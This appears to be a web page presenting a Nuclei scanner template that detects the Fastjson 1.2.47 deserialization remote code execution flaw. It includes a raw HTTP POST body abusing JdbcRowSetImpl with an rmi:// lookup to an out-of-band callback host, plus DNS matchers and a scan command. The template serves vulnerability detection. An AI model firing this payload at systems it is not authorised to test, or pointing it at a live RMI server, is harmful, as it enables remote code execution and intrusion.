Skip to content

Fastjson 1.2.47 - Remote Code Execution

ID: fastjson-1-2-47-rce

Severity: critical

Author: zh

Tags: rce,deserialization,oast,vulhub,fastjson

Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability.

id: fastjson-1-2-47-rce
info:
name: Fastjson 1.2.47 - Remote Code Execution
author: zh
severity: critical
description: Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability.
reference:
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
- https://www.freebuf.com/vuls/208339.html
- https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
- https://github.com/wyzxxz/fastjson_rce_tool
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
tags: rce,deserialization,oast,vulhub,fastjson
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: word
condition: and
words:
- "Bad Request"
- "400"
# digest: 4a0a00473045022100d31c106652c0f6f4b2f67e9e8d3a91c8c46b885c4c6c76699dd128e17c9b29e6022055acd7d99d84ce8cf02713c1966629e433dd5c7d23c347085812991690e750b0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml"

View on Github